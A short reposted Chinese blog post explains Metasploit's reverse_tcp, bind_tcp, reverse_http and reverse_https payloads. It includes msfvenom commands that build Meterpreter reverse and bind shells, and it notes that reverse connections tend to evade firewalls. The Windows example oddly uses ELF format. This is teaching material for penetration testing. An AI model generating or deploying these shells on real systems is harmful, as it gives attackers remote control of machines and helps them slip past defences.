当前位置:   article > 正文

msf的reverse_tcp和bind_tcp两者的区别

reverse_tcp

msf的reverse_tcp和bind_tcp两者的区别

reverse_tcp

攻击机设置一个端口(LPORT)和IP(LHOST),Payload在测试机执行连接攻击机IP的端口,这时如果在攻击机监听该端口会发现测试机已经连接。

msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=0.0.0.0 lport=4444  -f elf -o shell
  • 1

bind_tcp

攻击机设置一个端口(LPORT),Payload在测试机执行打开该端口,以便攻击机可以接入。

基于TCP的正向连接shell,因为在内网跨网段时无法连接到attack的机器,所以在内网中经常会使用,不需要设置LHOST。
例:

msfvenom -p linux/x86/meterpreter/bind_tcp lport=4444  -f elf -o shell
  • 1

reverse_http

基于http方式的反向连接,在网速慢的情况下不稳定。

reverse_https

基于https方式的反向连接,在网速慢的情况下不稳定, https如果反弹没有收到数据,可以将监听端口换成443试试

msfvenom -p windows/meterpreter/reverse_https lport=4444  -f elf -o shell
  • 1

安全性

采用reverse的方法一般较为安全,因为是在测试机连接攻击机,所以一般不会被防火墙发现;而bind在测试机打开端口时很容易被安全软件和防火墙发现

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/小蓝xlanll/article/detail/267306
推荐阅读
相关标签
  

闽ICP备14008679号